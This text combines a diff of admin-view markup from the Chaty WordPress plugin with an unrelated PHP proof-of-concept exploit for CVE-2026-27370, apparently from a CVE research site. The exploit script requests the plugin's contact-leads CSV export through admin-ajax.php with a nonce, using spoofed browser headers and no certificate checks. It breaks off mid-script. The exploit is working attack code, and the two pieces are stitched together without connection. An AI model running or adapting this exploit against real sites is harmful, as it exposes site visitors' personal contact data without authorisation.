                 <div class="chatway-footer flex flex-wrap items-center gap-2.5">
-                    <a id="go-to-first-step" class="inline-flex font-primary text-sm items-center px-4 h-10 gap-2.5 py-1 border border-solid text-center justify-center border-cht-primary rounded-lg text-cht-primary hover:border-cht-primary-100 hover:text-cht-primary-100 hover:bg-[#edf3f6]" href="#">
-                        <?php esc_html_e('Go to first step for Basic Settings', 'chaty'); ?>
-                    </a>
                     <div class="chatway--notice--info plugin-not-installed <?php echo esc_attr($chatwayStatus == 'not-installed'?'':'hidden') ?>">
-                        <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#c6d7e3] rounded-lg text-[#49687e] hover:text-[#49687e] hover:bg-[#edf3f6]">
+                        <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#0446DE] rounded-lg text-[#0446DE] hover:text-[#0446DE] hover:bg-[#edf3f6]">
+                            <svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.34244 19.2196L7.75235 16.7549L8.77406 18.3552C8.77406 18.3552 8.12501 18.2396 7.53378 18.5223C6.94255 18.8051 6.34244 19.2196 6.34244 19.2196Z" fill="#0038A5"/> <path d="M5.33214 18.0442C5.22094 17.7908 4.99137 17.6089 4.7192 17.5587L1.36657 16.9397C0.574712 16.7935 0 16.103 0 15.2978V5.29573C0 4.06435 0.603444 2.91115 1.61512 2.20917L3.77928 0.707513C4.63427 0.114254 5.6882 -0.11914 6.71372 0.0576742L14.4467 1.39095C16.0485 1.66711 17.2187 3.05642 17.2187 4.68179V12.2589C17.2187 13.1558 16.858 14.015 16.2176 14.643L13.4635 17.3442C12.4191 18.3684 10.9326 18.8042 9.50056 18.5058L7.90048 18.1725C7.61524 18.1131 7.31966 18.2066 7.12059 18.4194L6.44777 19.1385C6.24299 19.3574 5.88113 19.2955 5.7607 19.021L5.33214 18.0442Z" fill="#0446DE"/> <path d="M3.67153 3.41674C1.99029 3.0751 0.417969 4.36005 0.417969 6.07565V14.6199C0.417969 15.4248 0.992197 16.1151 1.78363 16.2617L5.10499 16.8768C5.38264 16.9282 5.61548 17.1165 5.72387 17.3772L6.02186 18.094C6.11216 18.3112 6.40077 18.355 6.5514 18.1743L7.12625 17.4849C7.29907 17.2776 7.56143 17.1666 7.83053 17.187L10.4714 17.3871C11.8039 17.488 12.9407 16.4341 12.9407 15.0978V6.66482C12.9407 5.87084 12.3816 5.18667 11.6035 5.02856L3.67153 3.41674Z" fill="#0038A5"/> <path d="M3.49148 3.40852C2.461 3.20868 1.50391 3.998 1.50391 5.04768V13.8333C1.50391 14.6631 2.11332 15.367 2.9346 15.4858L5.21294 15.8153C5.49031 15.8554 5.72905 16.032 5.84857 16.2855L6.16873 16.9646C6.25727 17.1823 6.54514 17.2284 6.6973 17.0494L7.17955 16.4898C7.36571 16.2737 7.64925 16.1677 7.93147 16.2085L11.0321 16.6569C12.0389 16.8026 12.9408 16.0217 12.9408 15.0044V6.61802C12.9408 5.81843 12.3739 5.13109 11.589 4.97886L3.49148 3.40852Z" fill="white"/> <path d="M9.39358 12.2318L4.57391 11.3868C4.22324 11.3254 3.93793 11.6059 4.07358 11.935C4.51422 13.0042 5.74496 14.6851 7.92538 14.1246C8.37439 14.0092 9.38997 13.4255 9.6761 12.648C9.74759 12.4538 9.59745 12.2675 9.39358 12.2318Z" fill="#0446DE"/> <ellipse cx="4.73835" cy="8.24894" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 4.73835 8.24894)" fill="#0446DE"/> <ellipse cx="9.25397" cy="9.08305" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 9.25397 9.08305)" fill="#0446DE"/> </svg>
                             <?php esc_html_e("Install Chatway plugin", "chaty") ?>
                             <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M12 8.667v4A1.334 1.334 0 0110.667 14H3.333A1.334 1.334 0 012 12.667V5.333A1.333 1.333 0 013.333 4h4M10 2h4v4M6.667 9.333L14 2" stroke="currentColor" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </a>
                     </div>
                     <div class="chatway--notice--info plugin-not-activated <?php echo esc_attr($chatwayStatus == 'not-activated'?'':'hidden') ?>">
-                        <a target="_blank" href="<?php echo admin_url("plugin-install.php?s=chatway&tab=search&type=author") ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#c6d7e3] rounded-lg text-[#49687e] hover:text-[#49687e] hover:bg-[#edf3f6]">
+                        <a target="_blank" href="<?php echo admin_url("admin.php?page=chaty-live-chat") ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#0446DE] rounded-lg text-[#0446DE] hover:text-[#0446DE] hover:bg-[#edf3f6]">
+                            <svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.34244 19.2196L7.75235 16.7549L8.77406 18.3552C8.77406 18.3552 8.12501 18.2396 7.53378 18.5223C6.94255 18.8051 6.34244 19.2196 6.34244 19.2196Z" fill="#0038A5"/> <path d="M5.33214 18.0442C5.22094 17.7908 4.99137 17.6089 4.7192 17.5587L1.36657 16.9397C0.574712 16.7935 0 16.103 0 15.2978V5.29573C0 4.06435 0.603444 2.91115 1.61512 2.20917L3.77928 0.707513C4.63427 0.114254 5.6882 -0.11914 6.71372 0.0576742L14.4467 1.39095C16.0485 1.66711 17.2187 3.05642 17.2187 4.68179V12.2589C17.2187 13.1558 16.858 14.015 16.2176 14.643L13.4635 17.3442C12.4191 18.3684 10.9326 18.8042 9.50056 18.5058L7.90048 18.1725C7.61524 18.1131 7.31966 18.2066 7.12059 18.4194L6.44777 19.1385C6.24299 19.3574 5.88113 19.2955 5.7607 19.021L5.33214 18.0442Z" fill="#0446DE"/> <path d="M3.67153 3.41674C1.99029 3.0751 0.417969 4.36005 0.417969 6.07565V14.6199C0.417969 15.4248 0.992197 16.1151 1.78363 16.2617L5.10499 16.8768C5.38264 16.9282 5.61548 17.1165 5.72387 17.3772L6.02186 18.094C6.11216 18.3112 6.40077 18.355 6.5514 18.1743L7.12625 17.4849C7.29907 17.2776 7.56143 17.1666 7.83053 17.187L10.4714 17.3871C11.8039 17.488 12.9407 16.4341 12.9407 15.0978V6.66482C12.9407 5.87084 12.3816 5.18667 11.6035 5.02856L3.67153 3.41674Z" fill="#0038A5"/> <path d="M3.49148 3.40852C2.461 3.20868 1.50391 3.998 1.50391 5.04768V13.8333C1.50391 14.6631 2.11332 15.367 2.9346 15.4858L5.21294 15.8153C5.49031 15.8554 5.72905 16.032 5.84857 16.2855L6.16873 16.9646C6.25727 17.1823 6.54514 17.2284 6.6973 17.0494L7.17955 16.4898C7.36571 16.2737 7.64925 16.1677 7.93147 16.2085L11.0321 16.6569C12.0389 16.8026 12.9408 16.0217 12.9408 15.0044V6.61802C12.9408 5.81843 12.3739 5.13109 11.589 4.97886L3.49148 3.40852Z" fill="white"/> <path d="M9.39358 12.2318L4.57391 11.3868C4.22324 11.3254 3.93793 11.6059 4.07358 11.935C4.51422 13.0042 5.74496 14.6851 7.92538 14.1246C8.37439 14.0092 9.38997 13.4255 9.6761 12.648C9.74759 12.4538 9.59745 12.2675 9.39358 12.2318Z" fill="#0446DE"/> <ellipse cx="4.73835" cy="8.24894" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 4.73835 8.24894)" fill="#0446DE"/> <ellipse cx="9.25397" cy="9.08305" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 9.25397 9.08305)" fill="#0446DE"/> </svg>
                             <?php esc_html_e("Activate Chatway plugin", "chaty") ?>
                             <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M12 8.667v4A1.334 1.334 0 0110.667 14H3.333A1.334 1.334 0 012 12.667V5.333A1.333 1.333 0 013.333 4h4M10 2h4v4M6.667 9.333L14 2" stroke="currentColor" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </a>
                     </div>
                     <div class="chatway--notice--info plugin-not-logged-in <?php echo esc_attr($chatwayStatus == 'not-logged-in'?'':'hidden') ?>">
-                        <a target="_blank" href="<?php echo admin_url('admin.php?page=chatway') ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#c6d7e3] rounded-lg text-[#49687e] hover:text-[#49687e] hover:bg-[#edf3f6]">
+                        <a target="_blank" href="<?php echo admin_url('admin.php?page=chatway') ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#0446DE] rounded-lg text-[#0446DE] hover:text-[#0446DE] hover:bg-[#edf3f6]">
+                            <svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.34244 19.2196L7.75235 16.7549L8.77406 18.3552C8.77406 18.3552 8.12501 18.2396 7.53378 18.5223C6.94255 18.8051 6.34244 19.2196 6.34244 19.2196Z" fill="#0038A5"/> <path d="M5.33214 18.0442C5.22094 17.7908 4.99137 17.6089 4.7192 17.5587L1.36657 16.9397C0.574712 16.7935 0 16.103 0 15.2978V5.29573C0 4.06435 0.603444 2.91115 1.61512 2.20917L3.77928 0.707513C4.63427 0.114254 5.6882 -0.11914 6.71372 0.0576742L14.4467 1.39095C16.0485 1.66711 17.2187 3.05642 17.2187 4.68179V12.2589C17.2187 13.1558 16.858 14.015 16.2176 14.643L13.4635 17.3442C12.4191 18.3684 10.9326 18.8042 9.50056 18.5058L7.90048 18.1725C7.61524 18.1131 7.31966 18.2066 7.12059 18.4194L6.44777 19.1385C6.24299 19.3574 5.88113 19.2955 5.7607 19.021L5.33214 18.0442Z" fill="#0446DE"/> <path d="M3.67153 3.41674C1.99029 3.0751 0.417969 4.36005 0.417969 6.07565V14.6199C0.417969 15.4248 0.992197 16.1151 1.78363 16.2617L5.10499 16.8768C5.38264 16.9282 5.61548 17.1165 5.72387 17.3772L6.02186 18.094C6.11216 18.3112 6.40077 18.355 6.5514 18.1743L7.12625 17.4849C7.29907 17.2776 7.56143 17.1666 7.83053 17.187L10.4714 17.3871C11.8039 17.488 12.9407 16.4341 12.9407 15.0978V6.66482C12.9407 5.87084 12.3816 5.18667 11.6035 5.02856L3.67153 3.41674Z" fill="#0038A5"/> <path d="M3.49148 3.40852C2.461 3.20868 1.50391 3.998 1.50391 5.04768V13.8333C1.50391 14.6631 2.11332 15.367 2.9346 15.4858L5.21294 15.8153C5.49031 15.8554 5.72905 16.032 5.84857 16.2855L6.16873 16.9646C6.25727 17.1823 6.54514 17.2284 6.6973 17.0494L7.17955 16.4898C7.36571 16.2737 7.64925 16.1677 7.93147 16.2085L11.0321 16.6569C12.0389 16.8026 12.9408 16.0217 12.9408 15.0044V6.61802C12.9408 5.81843 12.3739 5.13109 11.589 4.97886L3.49148 3.40852Z" fill="white"/> <path d="M9.39358 12.2318L4.57391 11.3868C4.22324 11.3254 3.93793 11.6059 4.07358 11.935C4.51422 13.0042 5.74496 14.6851 7.92538 14.1246C8.37439 14.0092 9.38997 13.4255 9.6761 12.648C9.74759 12.4538 9.59745 12.2675 9.39358 12.2318Z" fill="#0446DE"/> <ellipse cx="4.73835" cy="8.24894" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 4.73835 8.24894)" fill="#0446DE"/> <ellipse cx="9.25397" cy="9.08305" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 9.25397 9.08305)" fill="#0446DE"/> </svg>
                             <?php esc_html_e("Sign in to Chatway", "chaty") ?>
                             <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M12 8.667v4A1.334 1.334 0 0110.667 14H3.333A1.334 1.334 0 012 12.667V5.333A1.333 1.333 0 013.333 4h4M10 2h4v4M6.667 9.333L14 2" stroke="currentColor" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </a>
                     </div>
                     <div class="chatway--notice--info plugin-not-onboarded <?php echo esc_attr($chatwayStatus == 'not-onboarded'?'':'hidden') ?>">
-                        <a target="_blank" href="<?php echo admin_url('admin.php?page=chatway') ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#c6d7e3] rounded-lg text-[#49687e] hover:text-[#49687e] hover:bg-[#edf3f6]">
+                        <a target="_blank" href="<?php echo admin_url('admin.php?page=chatway') ?>" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#0446DE] rounded-lg text-[#0446DE] hover:text-[#0446DE] hover:bg-[#edf3f6]">
+                            <svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.34244 19.2196L7.75235 16.7549L8.77406 18.3552C8.77406 18.3552 8.12501 18.2396 7.53378 18.5223C6.94255 18.8051 6.34244 19.2196 6.34244 19.2196Z" fill="#0038A5"/> <path d="M5.33214 18.0442C5.22094 17.7908 4.99137 17.6089 4.7192 17.5587L1.36657 16.9397C0.574712 16.7935 0 16.103 0 15.2978V5.29573C0 4.06435 0.603444 2.91115 1.61512 2.20917L3.77928 0.707513C4.63427 0.114254 5.6882 -0.11914 6.71372 0.0576742L14.4467 1.39095C16.0485 1.66711 17.2187 3.05642 17.2187 4.68179V12.2589C17.2187 13.1558 16.858 14.015 16.2176 14.643L13.4635 17.3442C12.4191 18.3684 10.9326 18.8042 9.50056 18.5058L7.90048 18.1725C7.61524 18.1131 7.31966 18.2066 7.12059 18.4194L6.44777 19.1385C6.24299 19.3574 5.88113 19.2955 5.7607 19.021L5.33214 18.0442Z" fill="#0446DE"/> <path d="M3.67153 3.41674C1.99029 3.0751 0.417969 4.36005 0.417969 6.07565V14.6199C0.417969 15.4248 0.992197 16.1151 1.78363 16.2617L5.10499 16.8768C5.38264 16.9282 5.61548 17.1165 5.72387 17.3772L6.02186 18.094C6.11216 18.3112 6.40077 18.355 6.5514 18.1743L7.12625 17.4849C7.29907 17.2776 7.56143 17.1666 7.83053 17.187L10.4714 17.3871C11.8039 17.488 12.9407 16.4341 12.9407 15.0978V6.66482C12.9407 5.87084 12.3816 5.18667 11.6035 5.02856L3.67153 3.41674Z" fill="#0038A5"/> <path d="M3.49148 3.40852C2.461 3.20868 1.50391 3.998 1.50391 5.04768V13.8333C1.50391 14.6631 2.11332 15.367 2.9346 15.4858L5.21294 15.8153C5.49031 15.8554 5.72905 16.032 5.84857 16.2855L6.16873 16.9646C6.25727 17.1823 6.54514 17.2284 6.6973 17.0494L7.17955 16.4898C7.36571 16.2737 7.64925 16.1677 7.93147 16.2085L11.0321 16.6569C12.0389 16.8026 12.9408 16.0217 12.9408 15.0044V6.61802C12.9408 5.81843 12.3739 5.13109 11.589 4.97886L3.49148 3.40852Z" fill="white"/> <path d="M9.39358 12.2318L4.57391 11.3868C4.22324 11.3254 3.93793 11.6059 4.07358 11.935C4.51422 13.0042 5.74496 14.6851 7.92538 14.1246C8.37439 14.0092 9.38997 13.4255 9.6761 12.648C9.74759 12.4538 9.59745 12.2675 9.39358 12.2318Z" fill="#0446DE"/> <ellipse cx="4.73835" cy="8.24894" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 4.73835 8.24894)" fill="#0446DE"/> <ellipse cx="9.25397" cy="9.08305" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 9.25397 9.08305)" fill="#0446DE"/> </svg>
                             <?php esc_html_e("Complete onboarding", "chaty") ?>
                             <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M12 8.667v4A1.334 1.334 0 0110.667 14H3.333A1.334 1.334 0 012 12.667V5.333A1.333 1.333 0 013.333 4h4M10 2h4v4M6.667 9.333L14 2" stroke="currentColor" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </a>
                     </div>
                     <div class="chatway--notice--info plugin-completed <?php echo esc_attr($chatwayStatus == 'completed'?'':'hidden') ?>">
-                        <a href="<?php echo admin_url("admin.php?page=chatway") ?>" target="_blank" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#c6d7e3] rounded-lg text-[#49687e] hover:text-[#49687e] hover:bg-[#edf3f6]">
-                            <?php esc_html_e("Chatway Dashboard", "chaty") ?>
+                        <a href="<?php echo admin_url("admin.php?page=chatway") ?>" target="_blank" class="inline-flex text-sm h-10 font-primary px-4 items-center gap-2.5 py-1 border border-solid text-center justify-center border-[#0446DE] rounded-lg text-[#0446DE] hover:text-[#0446DE] hover:bg-[#edf3f6]">
+                            <svg width="18" height="20" viewBox="0 0 18 20" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6.34244 19.2196L7.75235 16.7549L8.77406 18.3552C8.77406 18.3552 8.12501 18.2396 7.53378 18.5223C6.94255 18.8051 6.34244 19.2196 6.34244 19.2196Z" fill="#0038A5"/> <path d="M5.33214 18.0442C5.22094 17.7908 4.99137 17.6089 4.7192 17.5587L1.36657 16.9397C0.574712 16.7935 0 16.103 0 15.2978V5.29573C0 4.06435 0.603444 2.91115 1.61512 2.20917L3.77928 0.707513C4.63427 0.114254 5.6882 -0.11914 6.71372 0.0576742L14.4467 1.39095C16.0485 1.66711 17.2187 3.05642 17.2187 4.68179V12.2589C17.2187 13.1558 16.858 14.015 16.2176 14.643L13.4635 17.3442C12.4191 18.3684 10.9326 18.8042 9.50056 18.5058L7.90048 18.1725C7.61524 18.1131 7.31966 18.2066 7.12059 18.4194L6.44777 19.1385C6.24299 19.3574 5.88113 19.2955 5.7607 19.021L5.33214 18.0442Z" fill="#0446DE"/> <path d="M3.67153 3.41674C1.99029 3.0751 0.417969 4.36005 0.417969 6.07565V14.6199C0.417969 15.4248 0.992197 16.1151 1.78363 16.2617L5.10499 16.8768C5.38264 16.9282 5.61548 17.1165 5.72387 17.3772L6.02186 18.094C6.11216 18.3112 6.40077 18.355 6.5514 18.1743L7.12625 17.4849C7.29907 17.2776 7.56143 17.1666 7.83053 17.187L10.4714 17.3871C11.8039 17.488 12.9407 16.4341 12.9407 15.0978V6.66482C12.9407 5.87084 12.3816 5.18667 11.6035 5.02856L3.67153 3.41674Z" fill="#0038A5"/> <path d="M3.49148 3.40852C2.461 3.20868 1.50391 3.998 1.50391 5.04768V13.8333C1.50391 14.6631 2.11332 15.367 2.9346 15.4858L5.21294 15.8153C5.49031 15.8554 5.72905 16.032 5.84857 16.2855L6.16873 16.9646C6.25727 17.1823 6.54514 17.2284 6.6973 17.0494L7.17955 16.4898C7.36571 16.2737 7.64925 16.1677 7.93147 16.2085L11.0321 16.6569C12.0389 16.8026 12.9408 16.0217 12.9408 15.0044V6.61802C12.9408 5.81843 12.3739 5.13109 11.589 4.97886L3.49148 3.40852Z" fill="white"/> <path d="M9.39358 12.2318L4.57391 11.3868C4.22324 11.3254 3.93793 11.6059 4.07358 11.935C4.51422 13.0042 5.74496 14.6851 7.92538 14.1246C8.37439 14.0092 9.38997 13.4255 9.6761 12.648C9.74759 12.4538 9.59745 12.2675 9.39358 12.2318Z" fill="#0446DE"/> <ellipse cx="4.73835" cy="8.24894" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 4.73835 8.24894)" fill="#0446DE"/> <ellipse cx="9.25397" cy="9.08305" rx="0.854538" ry="1.46492" transform="rotate(-4.90348 9.25397 9.08305)" fill="#0446DE"/> </svg>
+                            <?php esc_html_e("Manage Live Chat", "chaty") ?>
                             <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M12 8.667v4A1.334 1.334 0 0110.667 14H3.333A1.334 1.334 0 012 12.667V5.333A1.333 1.333 0 013.333 4h4M10 2h4v4M6.667 9.333L14 2" stroke="currentColor" stroke-width="1.33" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                         </a>
                     </div>
                 </div>
+                <div class="font-primary mt-1 text-[#49687E] text-xs"><?php esc_html_e("Skip this step by saving the widget", "chaty") ?></div>
+            </div>
+            <div class="mt-5">
+                <div class="text-[#49687E] text-base pb-3 font-medium"><?php esc_html_e('Why Chatway?', 'chaty'); ?></div>
+                <ul>
+                    <?php foreach ($chatway_feature as $feature) { ?>
+                        <li class="text-[#092030] text-sm flex pb-2.5 mb-0 items-center">
+                            <span class="flex-none inline-flex items-center w-6 h-6 bg-[#27B8361F] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                            <?php echo esc_html($feature); ?>
+                        </li>
+                    <?php } ?>
+                </ul>
             </div>
         </div>
-        <div class="font-primary w-64 text-center mt-1 text-cht-gray-150 text-xs manage-live-chat-skip-text"><?php esc_html_e("You can skip this step by saving the widget", "chaty") ?></div>
     </div>
 </div>
 No newline at end of file
--- a/chaty/views/admin/chatyway-info-popup.php
+++ b/chaty/views/admin/chatyway-info-popup.php
@@ -16,43 +16,58 @@
                     <img src="<?php echo esc_url(plugins_url('../../admin/assets/images/modal/cloud-4.png', __FILE__)); ?>" alt="" class="floating-image cloud-4" />
                 </div>
                 <div class="chatway-steps step-1 w-full" >
-                    <div class="chatyway-popup-box-logo mb-5 text-center">
-                        <img class="inline-block" src="<?php echo esc_url(plugins_url('../../admin/assets/images/logo-color.svg', __FILE__)); ?>" alt="Chaty" class="logo">
+                    <div class="chatway-title text-2xl pb-4 font-primary text-[28px] text-[#092030] font-semibold"><?php esc_html_e("Chatway: Live Chat & AI Support", "chaty"); ?></div>
+                    <div class="flex justify-center">
+                        <div class="inline-flex">
+                            <ul class="text-left">
+                                <li class="text-[#092030] text-sm flex items-center">
+                                    <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                                    <?php esc_html_e("24/7 AI support that handles repetitive questions", "chaty"); ?>
+                                </li>
+                                <li class="text-[#092030] text-sm flex items-center">
+                                    <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                                    <?php esc_html_e("All chats in one inbox (Website, Email, Messenger, Instagram)", "chaty"); ?>
+                                </li>
+                                <li class="text-[#092030] text-sm flex items-center">
+                                    <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                                    <?php esc_html_e("Custom workflows, multiple agents, widgets & inboxes", "chaty"); ?>
+                                </li>
+                                <li class="text-[#092030] text-sm flex items-center">
+                                    <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#0C7C17" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
+                                    <?php esc_html_e("Live visitor insights and Multilingual support", "chaty"); ?>
+                                </li>
+                            </ul>
+                        </div>
                     </div>
-                    <div class="chatway-title text-2xl pb-4 font-primary text-cht-gray-150"><?php esc_html_e("Add Chatway Live Chat widget to your website", "chaty"); ?></div>
-                    <ul class="text-left">
-                        <li class="text-cht-gray-150 text-base flex">
-                            <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#68CB9B" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
-                            <?php esc_html_e("Unlimited conversations, email, and Facebook Messenger integrations", "chaty"); ?>
-                        </li>
-                        <li class="text-cht-gray-150 text-base flex">
-                            <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#68CB9B" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
-                            <?php esc_html_e("Team collaboration with agents", "chaty"); ?>
-                        </li>
-                        <li class="text-cht-gray-150 text-base flex">
-                            <span class="flex-none inline-flex items-center w-6 h-6 bg-[#e4fff5] mr-2 rounded-full text-center"><svg class="mx-auto" width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" svg-inline="" role="presentation" focusable="false" tabindex="-1"><path d="M13.333 4l-7.334 7.333L2.666 8" stroke="#68CB9B" stroke-width="1.67" stroke-linecap="round" stroke-linejoin="round"></path></svg></span>
-                       

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-27370 - Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty <= 3.5.1 - Unauthenticated Information Exposure

<?php
/**
 * Proof of Concept for CVE-2026-27370
 * Unauthenticated Contact Leads Export Vulnerability in Chaty WordPress Plugin
 * 
 * Usage: php poc.php --url=https://target.site --nonce=VALID_NONCE
 * 
 * Note: Requires a valid nonce value. Nonces may be obtainable through
 * other information disclosure vulnerabilities or predictable patterns.
 */

$target_url = "https://target.site"; // Configure target URL

// Parse command line arguments
$options = getopt("", ["url:", "nonce:"]);
if (isset($options['url'])) {
    $target_url = rtrim($options['url'], '/');
}

if (!isset($options['nonce'])) {
    echo "[!] Error: Nonce parameter required. Use --nonce=VALID_NONCEn";
    echo "[!] Nonce may be obtainable from other plugin endpoints or predictable patterns.n";
    exit(1);
}

$nonce = $options['nonce'];

// Construct the exploit URL
$ajax_url = $target_url . "/wp-admin/admin-ajax.php";

// Prepare exploit parameters
$params = [
    'download_chaty_file' => 'chaty_contact_leads',
    'nonce' => $nonce
];

$query_string = http_build_query($params);
$full_url = $ajax_url . '?' . $query_string;

echo "[*] Target: $target_urln";
echo "[*] Nonce: $noncen";
echo "[*] Attempting to download contact leads...n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Set headers to mimic legitimate browser request
$headers = [
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: en-US,en;q=0.5',
    'Connection: keep-alive',
    'Upgrade-Insecure-Requests: 1'
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$content_type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);

curl_close($ch);

// Analyze response
if ($http_code === 200 && strpos($content_type, 'application/octet-stream') !== false) {
    echo "[+] SUCCESS: CSV file downloaded!n";
    echo "[+] Content-Type: $content_typen";
    echo "[+] Response length: " . strlen($response) . " bytesnn";
    
    // Display first 1000 characters of CSV content
